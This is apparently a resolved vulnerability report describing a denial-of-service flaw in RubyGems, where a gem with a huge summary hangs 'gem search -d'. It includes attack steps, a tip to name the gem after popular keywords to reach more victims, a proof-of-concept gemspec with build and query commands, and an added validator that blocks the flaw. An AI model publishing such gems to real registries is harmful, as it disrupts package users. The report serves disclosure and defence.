No limit on summary length allows Denial of Service
High
RubyGems
Reported by
mame
Vulnerability Details
Technical details and impact analysis
Currently, there is no limit on summary length. I think pushing a gem whose summary is huge will make `gem search` unavailable.
This is not Arbitrary Code Execution, but it is really easy to attack. According to the CVSS v3.0 Calculator, the severity is High (7.5).
## How to attack
1) An attacker creates a gem with a huge summary string and pushes it to rubygems.org.
2) A victim runs `gem search -d <substring-of-the-name-of-the-gem>`, but it gives no response.
It may be good for the gem name to include a frequently-searched keyword, such as "foo-rails-bar" or "foo-sinatra-bar".
## Proof of concept
1) Prepare the following gemspec.
~~~~
Gem::Specification.new do |spec|
  spec.name = "huge-summary"
  spec.version = "0.0.1"
  spec.authors = ["Yusuke Endoh"]
  spec.email = ["[email protected]"]
  spec.summary = "foo" * 10000000 # a 30,000,000-character summary
  spec.homepage = "http://example.com/"
  spec.license = "MIT"
end
~~~~
2) Run the following commands
~~~~
gem build huge-summary.gemspec
gem install huge-summary-0.0.1.gem
~~~~
3) Run the following command.
~~~~
gem query huge-summary -d
~~~~
It will not answer.
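The report's root cause is that nothing bounds the size of a gemspec summary before it is accepted and later printed by `gem search -d`. The check below is an added example written for this page, not code from the report or from RubyGems itself: a hypothetical validator (`check_summary_length!`, with the assumed constant `MAX_SUMMARY_LENGTH`) that rejects a `Gem::Specification` whose `summary` or `description` exceeds a fixed length, exercised against a constructed ordinary spec and one modelled on the proof of concept.

```ruby
require "rubygems"

# Assumed limit for this example (not a RubyGems constant): small enough that
# `gem search -d` can print every matching summary promptly.
MAX_SUMMARY_LENGTH = 1_000

# Hypothetical validator: raise Gem::InvalidSpecificationException when the
# summary or description of a gemspec is longer than `max` characters.
def check_summary_length!(spec, max = MAX_SUMMARY_LENGTH)
  %w[summary description].each do |field|
    value = spec.send(field).to_s
    next if value.length <= max
    raise Gem::InvalidSpecificationException,
          "#{field} is #{value.length} characters; maximum is #{max}"
  end
  true
end

# Boolean wrapper for callers that would rather not rescue the exception.
def summary_within_limit?(spec, max = MAX_SUMMARY_LENGTH)
  check_summary_length!(spec, max)
  true
rescue Gem::InvalidSpecificationException
  false
end

# Constructed sample spec builder; the name and author are placeholders.
def build_spec(summary)
  Gem::Specification.new do |spec|
    spec.name    = "example-gem"
    spec.version = "0.0.1"
    spec.authors = ["Example Author"]
    spec.summary = summary
    spec.license = "MIT"
  end
end

OK_SPEC   = build_spec("A short, ordinary summary")
HUGE_SPEC = build_spec("foo" * 10_000_000) # same size as the report's PoC

if __FILE__ == $0
  puts summary_within_limit?(OK_SPEC)   # true
  puts summary_within_limit?(HUGE_SPEC) # false
end
```

Such a check belongs at the point where a gem is accepted for publication (and, defensively, when a client indexes or displays specs), since a limit enforced only in the client still leaves already-published oversized summaries to be printed.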
Report Details
Additional information and metadata
State: Closed
Substate: Resolved
Weakness: Uncontrolled Resource Consumption